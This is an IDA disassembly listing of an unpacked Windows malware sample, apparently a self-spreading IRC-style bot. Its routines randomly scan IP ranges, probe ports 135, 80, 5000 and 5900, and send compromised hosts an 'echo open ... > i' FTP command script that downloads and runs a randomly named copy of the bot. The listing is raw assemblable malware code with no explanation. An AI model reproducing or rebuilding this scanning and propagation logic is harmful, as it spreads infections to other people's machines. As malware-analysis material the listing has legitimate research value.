;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 5B359CD0EBEEAC6C423D0150B94523A0
; File Name : u:\work\5b359cd0ebeeac6c423d0150b94523a0_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00233000 (2306048.)
; Section size in file : 00233000 (2306048.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; CODE XREF: sub_403B2C+41DB�p
var_2000 = byte ptr -2000h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 2000h
call sub_4220C0
push ebx
push edi
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
lea eax, [ebp+var_1000]
push offset aSStats ; "%s (Stats):"
push eax
xor ebx, ebx
call sub_422063
add esp, 0Ch
cmp dword_432088, ebx
mov edi, 1000h
jz short loc_401078
push esi
mov esi, offset dword_432090
loc_40103D: ; CODE XREF: start+75�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-27h]
push eax
lea eax, [ebp+var_2000]
push offset aSD ; " (%s: %d),"
push eax
call sub_422063
lea eax, [ebp+var_2000]
push edi
push eax
lea eax, [ebp+var_1000]
push eax
call sub_421F40
add esi, 48h
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_40103D
pop esi
loc_401078: ; CODE XREF: start+35�j
push 0
push dword_4554F0
call dword_42F164 ; GetTickCount
push eax
call sub_418A1B
push eax
push ebx
push dword_455398
lea eax, [ebp+var_2000]
push offset aEftpdDTotalDIn ; " (EFTPD): (%d), Total -> (%d in %s)"
push eax
call sub_422063
lea eax, [ebp+var_2000]
push edi
push eax
lea eax, [ebp+var_1000]
push eax
call sub_421F40
add esp, 2Ch
cmp ebx, [ebp+arg_10]
lea eax, [ebp+var_1000]
pop edi
pop ebx
push eax
push [ebp+arg_4]
push [ebp+arg_0]
jg short loc_4010D6
cmp [ebp+arg_8], 0
jnz short loc_4010DD
loc_4010D6: ; CODE XREF: start+CE�j
call sub_4104F6
jmp short loc_4010E2
; ---------------------------------------------------------------------------
loc_4010DD: ; CODE XREF: start+D4�j
call sub_410491
loc_4010E2: ; CODE XREF: start+DB�j
add esp, 0Ch
leave
retn
start endp
; =============== S U B R O U T I N E =======================================
sub_4010E7 proc near ; CODE XREF: sub_401160+F6�p
; sub_401160+FC�p ...
push esi
push edi
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
call sub_4220FC
push 1Ah
pop edi
cdq
mov ecx, edi
push 61h
idiv ecx
pop esi
add edx, esi
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_4220FC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_4220FC
cdq
idiv edi
add edx, esi
mov esi, offset dword_44D3B0
push edx
push offset aCCCCCC ; "%c%c%c%c%c%c"
push esi
call sub_422063
add esp, 20h
mov eax, esi
pop edi
pop esi
retn
sub_4010E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401160 proc near ; CODE XREF: .text:004031C4�p
; sub_40B63F+13C�p ...
var_6A0 = byte ptr -6A0h
var_2A0 = byte ptr -2A0h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_D0 = dword ptr 0D8h
push ebp
mov ebp, esp
sub esp, 6A0h
push ebx
push esi
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+arg_0]
mov [ebp+var_10], 2
push eax
call dword_45434C ; inet_addr
push [ebp+arg_D0]
mov [ebp+var_C], eax
call dword_454314 ; ntohs
push ebx
push 1
push 2
mov [ebp+var_E], ax
call dword_454394 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_4012EA
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_4542AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_4012EA
push ebx
lea eax, [ebp+var_6A0]
push 400h
push eax
push edi
call dword_454330 ; recv
call sub_4220FC
push 9
pop esi
cdq
mov ecx, esi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_4220FC
cdq
idiv esi
lea eax, [ebp+var_110]
push edx
push offset loc_43903C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_422063
lea eax, [ebp+arg_0]
push eax
call sub_414173
add esp, 24h
mov esi, offset dword_455388
test eax, eax
jnz short loc_401248
mov esi, offset dword_4552D0
loc_401248: ; CODE XREF: sub_401160+E1�j
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_110]
push eax
call sub_4010E7
push eax
call sub_4010E7
push eax
lea eax, [ebp+var_2A0]
push dword_44D680
push esi
mov esi, 190h
push offset aEchoOpenSDIEch ; "echo open %s %d > i &echo user %s %s >>"...
push esi
push eax
call sub_42219B
add esp, 24h
lea eax, [ebp+var_2A0]
push ebx
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_2A0]
push eax
push edi
call dword_454350 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4012EA
push esi
call dword_42F15C ; Sleep
lea eax, [ebp+var_110]
push eax
push offset aS_4 ; "%s\r\n"
lea eax, [ebp+var_2A0]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp+var_2A0]
push ebx
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_2A0]
push eax
push edi
call dword_454350 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4012EE
loc_4012EA: ; CODE XREF: sub_401160+50�j
; sub_401160+66�j ...
xor eax, eax
jmp short loc_40130C
; ---------------------------------------------------------------------------
loc_4012EE: ; CODE XREF: sub_401160+188�j
push ebx
lea eax, [ebp+var_6A0]
push 400h
push eax
push edi
call dword_454330 ; recv
push edi
call dword_4543AC ; closesocket
xor eax, eax
inc eax
loc_40130C: ; CODE XREF: sub_401160+18C�j
pop edi
pop esi
pop ebx
leave
retn
sub_401160 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401311 proc near ; CODE XREF: sub_403B2C+44C0�p
; sub_403B2C+6F79�p
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jz loc_401401
push 10h
mov ebx, offset dword_44D670
push 0
push ebx
call sub_4221F0
push 10h
lea eax, [ebp+var_20]
push [ebp+arg_0]
push eax
call sub_4222F0
mov esi, offset a__0 ; "."
lea eax, [ebp+var_20]
push esi
push eax
call sub_422248
add esp, 20h
mov [ebp+var_10], eax
test eax, eax
jz loc_401401
xor edi, edi
inc edi
loc_401361: ; CODE XREF: sub_401311+6C�j
push esi
push 0
call sub_422248
xor edx, edx
pop ecx
cmp eax, edx
pop ecx
mov [ebp+edi*4+var_10], eax
jz loc_401401
inc edi
cmp edi, 4
jl short loc_401361
cmp [ebp+arg_8], 1
jnz short loc_4013AB
cmp [ebp+arg_4], edx
mov ecx, offset asc_432D3C ; "x"
mov eax, offset a0 ; "0"
mov esi, ecx
jnz short loc_4013A7
mov esi, eax
mov edx, eax
loc_40139A: ; CODE XREF: sub_401311+98�j
cmp [ebp+arg_4], 0
jz short loc_4013A2
mov eax, ecx
loc_4013A2: ; CODE XREF: sub_401311+8D�j
push esi
push edx
push eax
jmp short loc_4013EC
; ---------------------------------------------------------------------------
loc_4013A7: ; CODE XREF: sub_401311+83�j
mov edx, ecx
jmp short loc_40139A
; ---------------------------------------------------------------------------
loc_4013AB: ; CODE XREF: sub_401311+72�j
cmp [ebp+arg_8], 2
jnz short loc_4013D0
cmp [ebp+arg_4], edx
mov ecx, offset asc_432D3C ; "x"
mov eax, offset a0 ; "0"
mov edx, ecx
jnz short loc_4013C4
mov edx, eax
loc_4013C4: ; CODE XREF: sub_401311+AF�j
cmp [ebp+arg_4], 0
jz short loc_4013CC
mov eax, ecx
loc_4013CC: ; CODE XREF: sub_401311+B7�j
push edx
push eax
jmp short loc_4013E9
; ---------------------------------------------------------------------------
loc_4013D0: ; CODE XREF: sub_401311+9E�j
cmp [ebp+arg_8], 3
jnz short loc_401401
cmp [ebp+arg_4], edx
mov eax, offset asc_432D3C ; "x"
jnz short loc_4013E5
mov eax, offset a0 ; "0"
loc_4013E5: ; CODE XREF: sub_401311+CD�j
push eax
push [ebp+var_8]
loc_4013E9: ; CODE XREF: sub_401311+BD�j
push [ebp+var_C]
loc_4013EC: ; CODE XREF: sub_401311+94�j
push [ebp+var_10]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push ebx
call sub_422063
add esp, 18h
mov eax, ebx
jmp short loc_401403
; ---------------------------------------------------------------------------
loc_401401: ; CODE XREF: sub_401311+D�j
; sub_401311+47�j ...
xor eax, eax
loc_401403: ; CODE XREF: sub_401311+EE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401311 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401408 proc near ; CODE XREF: sub_403B2C+4227�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_401450
mov eax, [ebp+arg_C]
mov eax, dword_44C588[eax*8]
push eax
call dword_45439C ; inet_ntoa
cmp [ebp+arg_8], 0
push eax
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSCipS ; "%s (CIP): %s"
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_401449
call sub_4104F6
loc_401444: ; CODE XREF: sub_401408+46�j
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_401449: ; CODE XREF: sub_401408+35�j
call sub_410491
jmp short loc_401444
; ---------------------------------------------------------------------------
loc_401450: ; CODE XREF: sub_401408+D�j
cmp [ebp+arg_8], 0
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSInactive ; "%s Inactive"
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40146D
call sub_4104F6
jmp short loc_401472
; ---------------------------------------------------------------------------
loc_40146D: ; CODE XREF: sub_401408+5C�j
call sub_410491
loc_401472: ; CODE XREF: sub_401408+63�j
add esp, 10h
pop ebp
retn
sub_401408 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401477 proc near ; CODE XREF: sub_40178D+52�p
var_C = dword ptr -0Ch
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_AC = dword ptr 0B4h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
arg_B8 = dword ptr 0C0h
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_AC]
push edi
cmp eax, 0FFFFFFFFh
jz loc_4015B1
lea eax, [eax+eax*8]
xor edi, edi
loc_401490: ; DATA XREF: .text:off_438DD0�o
cmp dword_432094[eax*8], edi
jz loc_4015B1
push 9
call sub_41C235
test eax, eax
pop ecx
jnz loc_4015B1
cmp dword_455600, edi
jnz short loc_4014D6
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
mov [esp+0Ch+var_C], 13BAh
push 410h
call sub_41409E
pop ecx
pop ecx
jmp short loc_4014DD
; ---------------------------------------------------------------------------
loc_4014D6: ; CODE XREF: sub_401477+3C�j
movzx eax, word_439010
loc_4014DD: ; CODE XREF: sub_401477+5D�j
push esi
mov esi, offset dword_44D3C4
push 104h
push esi
push edi
mov dword_44D5D4, eax
mov dword_44D5D0, edi
call dword_42F154 ; GetModuleFileNameA
push 103h
push offset loc_439030
push offset dword_44D4C8
call sub_4222F0
lea eax, [ebp+arg_10]
push 7Fh
push eax
push offset dword_44D5D8
mov dword_44D664, edi
call sub_4222F0
mov eax, [ebp+arg_B0]
push esi
push dword_44D5D4
mov dword_44D65C, eax
mov eax, [ebp+arg_B8]
mov dword_44D660, eax
mov eax, [ebp+arg_B4]
mov dword_44D658, eax
mov eax, [ebp+arg_CC]
push offset aPnmnw_7rscg0 ; "PnmNw.7RScG0"
push offset aSStartedPortIF ; "%s Started,Port: (%i), File: (%s)"
push 9
mov dword_44D668, eax
call sub_41BED7
add esp, 2Ch
mov dword_44D5CC, eax
lea eax, [ebp+var_4]
push eax
push edi
push offset dword_44D3C0
push offset sub_402190
push edi
push edi
call dword_42F158 ; CreateThread
mov ecx, dword_44D5CC
pop esi
imul ecx, 1018h
cmp eax, edi
mov dword_46D414[ecx], eax
jz short loc_4015B1
jmp short loc_4015A9
; ---------------------------------------------------------------------------
loc_4015A1: ; CODE XREF: sub_401477+138�j
push 32h
call dword_42F15C ; Sleep
loc_4015A9: ; CODE XREF: sub_401477+128�j
cmp dword_44D664, edi
jz short loc_4015A1
loc_4015B1: ; CODE XREF: sub_401477+E�j
; sub_401477+20�j ...
pop edi
leave
retn
sub_401477 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015B4 proc near ; CODE XREF: sub_401906:loc_40196E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:44C588h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_4223F0
add esp, 0Ch
push [ebp+arg_0]
call dword_454228 ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_454310 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_4223F0
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_4015B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015FC proc near ; CODE XREF: sub_401906+60�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push edi
or edi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_4], edi
mov [ebp+var_10], edi
call sub_422120
cmp eax, 0Fh
pop ecx
jbe short loc_401627
xor eax, eax
jmp loc_4016B1
; ---------------------------------------------------------------------------
loc_401627: ; CODE XREF: sub_4015FC+22�j
lea eax, [ebp+var_10]
push esi
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_422725
add esp, 18h
cmp [ebp+var_C], edi
mov esi, 0DFh
jnz short loc_40165F
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_40165F: ; CODE XREF: sub_4015FC+54�j
cmp [ebp+var_8], edi
jnz short loc_401671
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_8], edx
loc_401671: ; CODE XREF: sub_4015FC+66�j
cmp [ebp+var_4], edi
jnz short loc_401683
call sub_4220FC
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_4], edx
loc_401683: ; CODE XREF: sub_4015FC+78�j
mov edx, [ebp+var_10]
cmp edx, edi
jnz short loc_401692
call sub_4220FC
cdq
idiv esi
loc_401692: ; CODE XREF: sub_4015FC+8C�j
shl edx, 8
add edx, [ebp+var_4]
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
pop esi
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add eax, edx
mov dword_44C588[ecx*8], eax
loc_4016B1: ; CODE XREF: sub_4015FC+26�j
pop edi
leave
retn
sub_4015FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016B4 proc near ; CODE XREF: sub_401906+77�p
; sub_401AB3+32�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push offset dword_4552D0
push [ebp+arg_0]
call dword_45439C ; inet_ntoa
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_401786
push offset dword_455388
push [ebp+arg_0]
call dword_45439C ; inet_ntoa
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_401786
xor edi, edi
xor ebx, ebx
inc edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_454394 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_401786
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_454314 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4543B0 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_4542AC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4542FC ; select
push esi
mov edi, eax
call dword_4543AC ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
jmp short loc_401788
; ---------------------------------------------------------------------------
loc_401786: ; CODE XREF: sub_4016B4+24�j
; sub_4016B4+42�j ...
xor eax, eax
loc_401788: ; CODE XREF: sub_4016B4+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4016B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40178D proc near ; DATA XREF: sub_403B2C+4661�o
; sub_403B2C+70EE�o
var_CC = byte ptr -0CCh
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 33h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_CC]
inc ebx
rep movsd
mov [eax+0C0h], ebx
lea eax, [ebp+var_CC]
push eax
call dword_45434C ; inet_addr
push [ebp+var_4]
mov ecx, [ebp+var_30]
lea esi, [ebp+var_CC]
sub esp, 0CCh
mov dword_44C588[ecx*8], eax
push 33h
pop ecx
mov edi, esp
rep movsd
call sub_401477
push 8
call sub_41C235
add esp, 0D4h
cmp eax, ebx
jnz short loc_401818
mov esi, offset dword_44D398
push esi
call dword_42F148 ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_42F14C ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_401818
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_401818: ; CODE XREF: sub_40178D+66�j
; sub_40178D+82�j
mov eax, [ebp+var_30]
cmp [ebp+var_24], ebx
mov esi, dword_42F15C
mov edi, ebx
mov dword_44C58C[eax*8], ebx
jb short loc_4018A7
loc_40182F: ; CODE XREF: sub_40178D+118�j
push edi
lea eax, [ebp+var_CC]
push [ebp+var_30]
mov [ebp+var_28], edi
push [ebp+var_3C]
push eax
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSSDScanthreadD ; "%s (%s:%d), ScanThread: (%d), SubThread"...
push 8
call sub_41BED7
mov [ebp+var_2C], eax
imul eax, 1018h
mov ecx, [ebp+var_30]
add esp, 1Ch
mov dword_46D40C[eax], ecx
xor eax, eax
push eax
lea ecx, [ebp+var_CC]
push eax
push ecx
push offset sub_401906
push eax
push eax
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_2C]
imul ecx, 1018h
test eax, eax
mov dword_46D414[ecx], eax
jz short loc_40189D
jmp short loc_401897
; ---------------------------------------------------------------------------
loc_401893: ; CODE XREF: sub_40178D+10E�j
push 1Eh
call esi ; dword_42F15C
loc_401897: ; CODE XREF: sub_40178D+104�j
cmp [ebp+var_8], 0
jz short loc_401893
loc_40189D: ; CODE XREF: sub_40178D+102�j
push 1Eh
call esi ; dword_42F15C
inc edi
cmp edi, [ebp+var_24]
jbe short loc_40182F
loc_4018A7: ; CODE XREF: sub_40178D+A0�j
mov eax, [ebp+var_34]
test eax, eax
jz short loc_4018C0
imul eax, 0EA60h
push eax
call esi ; dword_42F15C
jmp short loc_4018CC
; ---------------------------------------------------------------------------
loc_4018B9: ; CODE XREF: sub_40178D+13D�j
push 7D0h
call esi ; dword_42F15C
loc_4018C0: ; CODE XREF: sub_40178D+11F�j
mov eax, [ebp+var_30]
cmp dword_44C58C[eax*8], ebx
jz short loc_4018B9
loc_4018CC: ; CODE XREF: sub_40178D+12A�j
mov eax, [ebp+var_30]
push 3E8h
and dword_44C58C[eax*8], 0
call esi ; dword_42F15C
push 8
call sub_41C235
cmp eax, ebx
pop ecx
jnz short loc_4018F5
push offset dword_44D398
call dword_42F148 ; RtlDeleteCriticalSection
loc_4018F5: ; CODE XREF: sub_40178D+15B�j
push [ebp+var_30]
call sub_41C059
pop ecx
push 0
call dword_42F150 ; ExitThread
sub_40178D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401906 proc near ; DATA XREF: sub_40178D+E4�o
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10C = byte ptr -10Ch
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D0 = byte ptr -0D0h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 33h
mov esi, eax
pop ecx
lea edi, [ebp+var_D0]
rep movsd
mov ecx, [ebp+var_8]
mov esi, [ebp+var_30]
mov [ebp+arg_0], ecx
mov dword ptr [eax+0C4h], 1
mov [ebp+var_4], esi
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
mov eax, esi
pop ecx
imul eax, 1018h
lea ebx, dword_46D40C[eax]
jmp loc_401A5B
; ---------------------------------------------------------------------------
loc_401958: ; CODE XREF: sub_401906+15F�j
cmp [ebp+var_14], 0
push eax
jz short loc_40196E
lea eax, [ebp+var_D0]
push eax
call sub_4015FC
pop ecx
jmp short loc_401973
; ---------------------------------------------------------------------------
loc_40196E: ; CODE XREF: sub_401906+57�j
call sub_4015B4
loc_401973: ; CODE XREF: sub_401906+66�j
pop ecx
mov edi, eax
push [ebp+var_3C]
push [ebp+var_40]
push edi
call sub_4016B4
add esp, 0Ch
cmp eax, 1
jnz loc_401A50
cmp [ebp+var_24], 0FFFFFFFFh
jnz short loc_4019AC
mov edi, offset dword_44D398
push edi
call dword_42F140 ; RtlEnterCriticalSection
push edi
call dword_42F144 ; RtlLeaveCriticalSection
jmp loc_401A50
; ---------------------------------------------------------------------------
loc_4019AC: ; CODE XREF: sub_401906+8C�j
push edi
call dword_45439C ; inet_ntoa
push eax
lea eax, [ebp+var_1A0]
push eax
call sub_422063
mov eax, [ebp+var_24]
lea eax, [eax+eax*8]
lea eax, ds:432050h[eax*8]
push eax
lea eax, [ebp+var_10C]
push eax
call sub_422063
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_190]
push eax
call sub_422063
mov eax, [ebp+var_20]
sub esp, 0B8h
mov [ebp+var_DC], eax
mov eax, [ebp+var_18]
mov [ebp+var_D8], eax
mov eax, [ebp+var_1C]
mov [ebp+var_E0], eax
mov eax, [ebp+var_40]
push 34h
mov [ebp+var_F0], eax
mov eax, [ebp+var_24]
pop ecx
mov [ebp+var_EC], esi
lea esi, [ebp+var_1A0]
mov edi, esp
push [ebp+arg_0]
mov [ebp+var_E8], eax
lea eax, [eax+eax*8]
rep movsd
lea ecx, [ebp+var_C0]
push ecx
call off_43208C[eax*8]
mov esi, [ebp+var_4]
add esp, 0D8h
loc_401A50: ; CODE XREF: sub_401906+82�j
; sub_401906+A1�j
push 7D0h
call dword_42F15C ; Sleep
loc_401A5B: ; CODE XREF: sub_401906+4D�j
mov eax, [ebx]
cmp dword_44C58C[eax*8], 0
jnz loc_401958
push esi
call sub_41C059
pop ecx
push 0
call dword_42F150 ; ExitThread
sub_401906 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A7A proc near ; CODE XREF: sub_401AB3+14C�p
; sub_401AB3+175�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_401AA8
loc_401A8B: ; CODE XREF: sub_401A7A+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_4227F0
add esp, 0Ch
test eax, eax
jz short loc_401AAE
inc esi
cmp esi, edi
jl short loc_401A8B
loc_401AA8: ; CODE XREF: sub_401A7A+F�j
xor eax, eax
loc_401AAA: ; CODE XREF: sub_401A7A+37�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_401AAE: ; CODE XREF: sub_401A7A+27�j
xor eax, eax
inc eax
jmp short loc_401AAA
sub_401A7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AB3 proc near ; CODE XREF: sub_40B63F+16�p
; .text:00411EA1�p ...
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_4220C0
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_401B1B
dec eax
jz short loc_401B12
dec eax
jz short loc_401AF6
dec eax
jz short loc_401B0C
dec eax
jnz short loc_401B0C
push 3
push 1388h
push [ebp+arg_0]
call dword_45434C ; inet_addr
push eax
call sub_4016B4
add esp, 0Ch
test eax, eax
jz short loc_401B0C
push 3
pop eax
jmp short loc_401B0E
; ---------------------------------------------------------------------------
loc_401AF6: ; CODE XREF: sub_401AB3+19�j
push 3
push 50h
loc_401AFA: ; CODE XREF: sub_401AB3+66�j
push [ebp+arg_0]
call dword_45434C ; inet_addr
push eax
call sub_4016B4
add esp, 0Ch
loc_401B0C: ; CODE XREF: sub_401AB3+1C�j
; sub_401AB3+1F�j ...
xor eax, eax
loc_401B0E: ; CODE XREF: sub_401AB3+41�j
; sub_401AB3+192�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_401B12: ; CODE XREF: sub_401AB3+16�j
push 3
push 170Ch
jmp short loc_401AFA
; ---------------------------------------------------------------------------
loc_401B1B: ; CODE XREF: sub_401AB3+13�j
push 6
push 1
push 2
call dword_454394 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_401B0C
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call dword_454314 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4140CF
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4542AC ; connect
cmp eax, edi
jz loc_401C39
push ebx
push 48h
push offset dword_432AE0
push esi
call dword_454350 ; send
cmp eax, edi
jz loc_401C39
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
